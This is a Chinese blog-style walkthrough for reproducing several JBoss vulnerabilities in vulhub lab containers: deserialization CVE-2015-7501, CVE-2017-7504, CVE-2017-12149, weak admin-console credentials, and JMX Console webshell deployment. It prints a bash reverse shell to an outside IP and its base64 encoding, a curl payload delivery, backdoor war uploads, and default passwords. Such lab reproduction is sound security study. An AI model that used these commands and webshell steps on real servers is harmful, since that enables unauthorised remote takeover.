当前位置: 首页 > article >正文

JBOSS中间件漏洞复现

CVE-2015-7501

1.开启环境

cd vulhub/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

docker ps

2.访问靶场

3.访问/invoker/JMXInvokerServlet目录

4.将反弹shell进⾏base64编码
bash -i >& /dev/tcp/47.121.191.208/6666 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC82NjY2IDA+JjE=
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC82NjY2IDA+JjE=

使用ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

curl 47.121.191.208:8080/invoker/JMXInvokerServlet --data-binary @exp.ser 

5.监听6666端口

反弹成功

CVE-2017-7504

1.开启环境

cd vulhub/jboss/CVE-2017-7504

docker-compose up -d

2.访问靶场

3.访问漏洞地址

/jbossmq-httpil/HTTPServerILServlet

4.使用python3 jexboss.py -u http://47.121.191.208:8080进行getshell

CVE-2017-12149 

1.开启环境

cd vulhub/jboss/CVE-2017-12149

docker-compose up -d

2.访问靶场

3.验证漏洞是否存在

访问此/invoker/readonly目录

返回500,说明存在漏洞

4.使用工具检测,执行命令

 Administration Console弱⼝令

1.开启环境

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

依旧是此环境

2.首先访问密码文件

密码文件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码:admin:vulhub

3.访问/admin-console/login.seam目录

使用上面的用户名密码进行登录

4.点击web应⽤,上传后⻔ shell.war

5.访问此文件

/shell/shell.jsp

6.测试连接

高版本JMX Console未授权 

1.依旧是12149的环境

2.访问/jmx-console/目录

用户名:admin

密码:vulhub

3.在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer

4.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

5.输⼊Invoke

http://47.121.191.208/zxin.war

6.访问zxin.jsp

/zxin/zxin.jsp

7.使用哥斯拉进行测试连接

低版本JMX Console未授权 

1.开启环境

cd vulhub-master/jboss/CVE-2017-7504

docker-compose up -d

2.访问靶场

3.访问/jmx-console目录

登录

admin admin

4.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)

5.使用哥斯拉进行测试连接


http://www.kler.cn/a/323038.html

相关文章:

  • 动态规划-完全背包问题——518.零钱兑换II
  • STM32寄存器结构体详解
  • WebChromeClient 方法分类及其功能
  • vue3【实战】切换全屏【组件封装】FullScreen.vue
  • 大数据实验9:Spark安装和编程实践
  • transformers 操作篇
  • STM32 RTC实时时钟学习总结
  • WordPress精选文章如何添加侧边栏和页面?
  • 计算物理精解【8】-计算原理精解【5】
  • 如何在ChatGPT的帮助下,使用“逻辑回归”技巧完成论文写作?
  • sql server 版本补丁更新
  • Superset二次开发之Git篇git fetch 异常信息汇总
  • 【深度学习基础模型】Variational Autoencoders (VAE) 详细理解并附实现代码。
  • 【基础知识】Go中的同步机制
  • 基于yolov8的辣椒缺陷检测系统python源码+onnx模型+评估指标曲线+精美GUI界面
  • STM32G431RBT6 VREF+与VDDA引脚
  • 计算机性能指标之MIPS
  • 极狐GitLab 17.4 重点功能解读【九】
  • Windows安全日志7关键事件ID分析
  • 95分App引领绿色消费新潮流,闲置物品焕发新生机
  • 【JS】函数柯里化
  • 「数组」离散化 / Luogu B3694(C++)
  • 畅阅读微信小程序
  • RHCS认证-Linux(RHel9)-Ansible
  • 代码随想录Day 58|拓扑排序、dijkstra算法精讲,题目:软件构建、参加科学大会
  • Linux操作系统中MongoDB